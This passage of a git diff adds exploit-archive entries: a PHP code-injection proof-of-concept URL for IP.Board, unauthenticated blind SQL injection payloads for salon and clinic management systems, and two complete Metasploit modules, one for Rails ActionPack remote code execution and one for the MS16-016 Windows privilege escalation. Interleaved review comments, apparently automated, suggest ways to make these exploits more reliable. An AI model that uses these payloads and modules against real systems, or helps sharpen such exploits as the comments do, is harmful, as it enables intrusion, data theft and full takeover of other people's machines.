Fields { public static \$customDatabaseId [...] +175. } + +Successful exploitation of this vulnerability requires the application running on PHP before version 5.4.24 or 5.5.8. + + +[-] Proof of Concept: + +http://[host]/[ips]/index.php?app=core&module=system&controller=content&do=find&content_class=cms\Fields1{}phpinfo();/* + + +[-] Solution: + +Update to version 4.1.13 or later. 
+ + +[-] Disclosure Timeline: + +[04/07/2016] - Vendor notified +[05/07/2016] - Vulnerability fixed in version 4.1.13: https://invisionpower.com/release-notes/4113-r44/ +[06/07/2016] - CVE number requested +[06/07/2016] - CVE number assigned +[07/07/2016] - Public disclosure + + +[-] CVE Reference: + +The Common Vulnerabilities and Exposures project (cve.mitre.org) +has assigned the name CVE-2016-6174 to this vulnerability. + + +[-] Credits: + +Vulnerability discovered by Egidio Romano. + + +[-] Original Advisory: + +http://karmainsecurity.com/KIS-2016-11 \ No newline at end of file diff --git a/platforms/php/webapps/40092.txt b/platforms/php/webapps/40092.txt new file mode 100755 index 000000000..ab9132e0a --- /dev/null +++ b/platforms/php/webapps/40092.txt 
@@ -0,0 +1,31 @@ +#### +# Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability +# Date : 11/07/2016 +# Exploit Author : Yakir Wizman +# Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system +# Version : All Versions +# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30 +#### +# Software Link : N/A +# Google Dork : N/A +# CVE : N/A +#### + +# Vendor Software Description: +# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon. +# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide. +# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system. +#### + +# No authentication (login) is required to exploit this vulnerability. +# Blind SQL Injection Proof-Of-Concept (Using SQLMap) +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# URL example : http://server/booking.php +# +# Page : booking.php +# Parameter : age (POST) +# Type : AND/OR time-based blind +# Title : MySQL >= 5.0.12 AND time-based blind +# Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test +# +#### diff --git a/platforms/php/webapps/40093.txt b/platforms/php/webapps/40093.txt new file mode 100755 index 000000000..3a3a5d062 --- /dev/null +++ b/platforms/php/webapps/40093.txt 
@@ -0,0 +1,27 @@ +#### +# Vulnerability Title : Clinic Management System Unauthenticated Blind SQL Injection (apointment.php age) Vulnerability +# Date : 11/07/2016 +# Exploit Author : Yakir Wizman +# Vendor Homepage : http://rexbd.net/software/clinic-management-system +# Version : All Versions +# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30 +#### + +#### +# Vendor Software Description: +# Clinico – Clinic Management System is powerful, flexible, and easy to use responsive platform. +# The system has control for all system modules thats enables you to develop your organization billing system and improve its effectiveness and quality. +#### + +# No authentication (login) is required to exploit this vulnerability. +# Blind SQL Injection Proof-Of-Concept (Using SQLMap) +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# URL example : http://server/apointment.php +# +# Page : apointment.php +# Parameter : age (POST) +# Type : AND/OR time-based blind +# Title : MySQL >= 5.0.12 AND time-based blind +# Payload : ame=Test&age=24’ AND SLEEP(5) AND 'dQNv'='dQNv&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test +# +#### diff --git a/platforms/ruby/remote/40086.rb b/platforms/ruby/remote/40086.rb new file mode 100755 index 000000000..5bc9da26e --- /dev/null +++ b/platforms/ruby/remote/40086.rb 
@@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the + inline request processor of the Ruby on Rails ActionPack component. + This vulnerability allows an attacker to process ERB to the inline + JSON processor, which is then rendered, permitting full RCE within + the runtime, without logging an error condition. + }, + 'Author' => + [ + 'RageLtMan ' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2098' ] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => false, + 'Targets' => [ ['Automatic', {} ] ], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultOptions' => { + "PrependFork" => true + }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), + OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id']) + ], self.class) + + end + + def json_request + code = Rex::Text.encode_base64(payload.encoded) + return { + datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"} + }.to_json + end + + def exploit + print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}") + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'ctype' => 'application/json', + 'headers' => { + 'Accept' => 'application/json' + }, + 'data' => json_request + }, 25) + end +end \ No newline at end of file 
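Review bot: `json_request` uses an explicit `return` in front of a hash literal whose opening `{` sits alone at the end of the line, which reads like a block; the idiomatic form is to drop the `return` and write `{ datastore['TARGETPARAM'] => { 'inline' => ... } }.to_json` as the last expression. `'DefaultOptions' => { "PrependFork" => true }` mixes double-quoted keys with the single-quoted strings used everywhere else in the info hash, and `initialize` has a stray blank line before its `end`. The file also lacks a trailing newline. The `References` list carries only the CVE entry; a `[ 'URL', ... ]` pointing at the Rails security announcement for CVE-2016-2098 would let readers find the fixed releases without leaving the module.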
diff --git a/platforms/windows/local/40085.rb b/platforms/windows/local/40085.rb
new file mode 100755
index 000000000..8c7fa0ed7
--- /dev/null
+++ b/platforms/windows/local/40085.rb
@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/reflective_dll_injection'
+require 'rex'
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Process
+ include Msf::Post::Windows::FileInfo
+ include Msf::Post::Windows::ReflectiveDLLInjection
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
+ 'Description' => %q{
+ This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
+ a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
+ the specified payload within the context of the elevated process.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Tamas Koczka', # Original Exploit
+ 'William Webb ' # C port and Metasploit module
+ ],
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ 'DisablePayloadHandler' => 'false'
+ },
+ 'Targets' =>
+ [
+ [ 'Windows 7 SP1', { } ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 4096,
+ 'DisableNops' => true
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2016-0051' ],
+ [ 'MSB', 'MS16-016' ]
+ ],
+ 'DisclosureDate' => 'Feb 09 2016',
+ 'DefaultTarget' => 0
+ }))
+ end
+
+ def check
+ if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+ return Exploit::CheckCode::Safe
+ end
+
+ Exploit::CheckCode::Detected
+ end
+
+ def exploit
+ if is_system?
+ fail_with(Failure::None, 'Session is already elevated')
+ end
+
+ if sysinfo["Architecture"] =~ /wow64/i
+ fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+ elsif sysinfo["Architecture"] =~ /x64/
+ fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+ end
+
+ print_status("Launching notepad to host the exploit...")
+ notepad_process_pid = cmd_exec_get_pid("notepad.exe")
+ begin
+ process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
+ print_good("Process #{process.pid} launched.")
+ rescue Rex::Post::Meterpreter::RequestError
+ print_status("Operation failed. Hosting exploit in the current process...")
+ process = client.sys.process.open
+ end
+
+ print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+ library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
+ library_path = ::File.expand_path(library_path)
+ exploit_mem, offset = inject_dll_into_process(process, library_path)
+ print_status("Exploit injected ... injecting payload into #{process.pid}...")
+ payload_mem = inject_into_process(process, payload.encoded)
+ thread = process.thread.create(exploit_mem + offset, payload_mem)
+ sleep(3)
+ print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
+ end
+end
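Review bot: `check` returns `Detected` for every 32-bit session without looking at the OS build or at mrxdav.sys itself, even though the only target is 'Windows 7 SP1' and the module mixes in `Msf::Post::Windows::FileInfo` without ever calling it; because a kernel exploit that misfires can take the host down, `check` should compare `sysinfo['OS']` against the supported version and use the `file_version` helper on `system32\drivers\mrxdav.sys` to return `Safe` when the driver is at or above the build shipped with MS16-016 (exact version to be confirmed from the bulletin). The two architecture tests are inconsistent — `/wow64/i` is case-insensitive while `/x64/` is not — and the `check` condition uses `or` where `||` is the conventional form: `if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/i`. After `process.thread.create` the module sleeps three seconds and prints 'Done' regardless of what the injected thread did; waiting on the thread handle or re-checking `is_system?` before reporting would give a truthful completion signal instead of pushing verification onto the operator. The description string also has a typo: `it's privileges` should read `its privileges`.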
